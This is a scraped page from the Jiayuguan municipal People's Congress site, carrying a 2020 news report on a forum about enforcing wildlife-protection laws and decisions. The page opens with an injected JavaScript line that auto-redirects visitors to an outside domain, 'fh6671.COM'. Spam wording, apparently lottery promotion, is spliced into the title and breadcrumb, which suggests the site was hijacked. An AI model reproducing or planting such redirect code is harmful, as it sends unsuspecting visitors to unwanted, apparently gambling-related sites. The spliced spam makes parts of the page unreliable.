function jumurl(){ window.location.href = 'fh6671.COM' } setTimeout(jumurl,2000); jumurl();

全天人工计划


欢迎您登录嘉峪关人大网站!
当前位置:全天人工计划  >>  新工作动态  >>  监督纵横  >>  法律监督  
市人大常委会“两法两决定”执法检查座谈会召开
来源: 嘉峪关日报      日期: 2020-06-22      作者: 李巍      点击数:

市人大常委会“两法两决定”执法检查座谈会召开

王进平出席会议并讲话

 

嘉峪关日报(记者李巍)6月19日,市人大常委会“两法两决定”执法检查座谈会召开。市人大常委会党组书记、主任王进平出席会议并讲话。

市人大常委会副主任荔瑾主持会议,并于会前带领我市省人大代表和部分市人大代表深入开通宾馆、迎宾路批发市场、中华孔雀苑和草湖国家湿地公园等处进行了实地检查。

副市长义战鹰出席会议并就进一步加强“两法两决定”的贯彻执行作了表态发言。

王进平指出,开展《中华人民共和国野生动物保护法》《关于全面禁止非法野生动物交易、革除滥食野生动物陋习、切实保障人民群众生命健康安全的决定》及省人大《甘肃省实施<中华人民共和国野生动物保护法>办法》《关于全面禁止非法野生动物交易、革除滥食野生动物陋习、切实保障人民群众生命健康安全的决定》执法检查,是贯彻落实习近平总书记关于强化公共卫生法治保障的重要指示要求,促进全社会增强生态环境保护和公共卫生安全意识的重要活动,是今年各级人大执法检查工作中的重中之重。

王进平强调,要进一步提高政治站位,采取灵活多样的方式,加大贯彻“两法两决定”的广度和深度,在全社会形成广泛认知;要结合普法工作,加大野生动物保护法的普法力度,全力做到家喻户晓;要主动作为,积极引导,切实处理好养殖产业“关闭”和“转型”的关系;要加强巡护工作和野生动物疫源、疫病监测工作;要建立建全有奖举报制度,依法加大对捕猎、交易和食用野生动物的打击力度;要做好市场交易、畜禽屠宰等各环节监管工作,让老百姓吃上放心肉。

会上,荔瑾和参会代表分别就各有关单位“两法两决定”贯彻落实情况、存在的问题以及下一步工作建议进行了交流发言。

市政府办、中级人民法院、人民检察院、公安局、司法局、财政局、生态环境局等单位主要负责人,市人大常委会农业城建环保工委全体人员参加会议。